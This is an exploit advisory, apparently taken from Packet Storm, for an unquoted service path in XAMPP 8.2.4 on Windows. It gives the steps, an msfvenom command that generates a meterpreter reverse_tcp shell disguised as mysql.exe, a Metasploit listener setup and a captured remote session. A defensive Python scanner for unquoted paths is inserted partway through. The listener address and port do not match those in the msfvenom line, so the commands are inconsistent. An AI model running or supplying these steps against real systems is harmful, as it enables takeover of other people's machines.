## https://sploitus.com/exploit?id=PACKETSTORM:173410
# Exploit Title: XAMPP 8.2.4 - Unquoted Path  
# Date: 07/2023  
# Exploit Author: Andrey Stoykov  
# Version: 8.2.4  
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe  
# Tested on: Windows Server 2022  
# Blog: http://msecureltd.blogspot.com/  
  
  
Steps to Exploit:  
  
1. Search for unquoted paths  
2. Generate meterpreter shell  
3. Copy shell to XAMPP directory replacing "mysql.exe"  
4. Exploit by double clicking on shell  
  
  
C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """  
  
mysql  
mysql  
C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini  
mysql Auto  
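As an added example (not part of the original advisory), a small Python parser for the output of the wmic command above. It mirrors the findstr filters (Auto start, outside the Windows directory, no quotes) and then keeps only services whose unquoted path contains a space before the executable name, since that is the condition under which the service control manager tries each space-delimited prefix before the intended binary. The sample table is constructed, and the exupd and exagent services in it are hypothetical.

```python
import re
# Constructed sample of `wmic service get name,displayname,pathname,startmode`
# output (fixed-width columns, header first); not captured from a real host.
_ROWS = [
    ("DisplayName", "Name", "PathName", "StartMode"),
    ("mysql", "mysql",
     r"C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini", "Auto"),
    ("Example Update Service", "exupd",  # hypothetical service
     r"C:\Program Files\Example Vendor\Update Service\exupd.exe -svc", "Auto"),
    ("Example Agent", "exagent",  # hypothetical service, correctly quoted
     r'"C:\Program Files\Example Vendor\agent.exe" /run', "Auto"),
    ("Windows Update", "wuauserv",
     r"C:\Windows\system32\svchost.exe -k netsvcs -p", "Manual"),
]
SAMPLE_WMIC_OUTPUT = "\n".join(f"{d:<26}{n:<12}{p:<76}{s}" for d, n, p, s in _ROWS) + "\n"

def parse_wmic_table(text):
    """Split wmic's fixed-width table into dicts using the header column offsets."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    cols = [(m.group(), m.start()) for m in re.finditer(r"\S+", lines[0])]
    records = []
    for row in lines[1:]:
        rec = {}
        for i, (name, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else None
            rec[name] = row[start:end].strip()
        records.append(rec)
    return records

def unquoted_path_candidates(pathname):
    """Paths the service control manager would try before the real binary;
    [] when the path is quoted, has no .exe, or has no space before the .exe."""
    p = pathname.strip()
    m = re.match(r"(?P<exe>.*?\.exe)", p, re.IGNORECASE)
    if not p or p.startswith('"') or not m or " " not in m.group("exe"):
        return []
    parts = m.group("exe").split(" ")
    # CreateProcess tries each space-delimited prefix with ".exe" appended.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def find_at_risk_services(wmic_text):
    """Apply the findstr filters above, then keep services with candidate prefixes."""
    hits = []
    for rec in parse_wmic_table(wmic_text):
        if rec["StartMode"].lower() != "auto" or \
           rec["PathName"].lower().startswith("c:\\windows\\"):
            continue
        cands = unquoted_path_candidates(rec["PathName"])
        if cands:
            hits.append({"Name": rec["Name"], "Candidates": cands})
    return hits
```

Each candidate path is a location where a writable directory would let an unrelated binary be started as the service account, so the list doubles as the set of directory ACLs to audit.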
  
  
  
// Generate shell  
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe  
  
  
// Setup listener  
msf6 > use exploit/multi/handler  
msf6 exploit(multi/handler) > set lhost 192.168.1.13  
msf6 exploit(multi/handler) > set lport 4443  
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp  
msf6 exploit(multi/handler) > run  
  
  
msf6 exploit(multi/handler) > run  
  
[*] Started reverse TCP handler on 192.168.1.13:4443  
[*] Sending stage (175686 bytes) to 192.168.1.11  
[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700  
  
  
meterpreter > getuid  
Server username: WIN-5PT4K404NLO\astoykov  
meterpreter > getpid  
Current pid: 4724  
meterpreter > shell  
Process 5884 created.  
Channel 1 created.  
Microsoft Windows [Version 10.0.20348.1]  
(c) Microsoft Corporation. All rights reserved.  
[...]  
C:\xampp\mysql\bin>dir  
dir  
Volume in drive C has no label.  
Volume Serial Number is 80B5-B405  
  
Directory of C:\xampp\mysql\bin  
[...]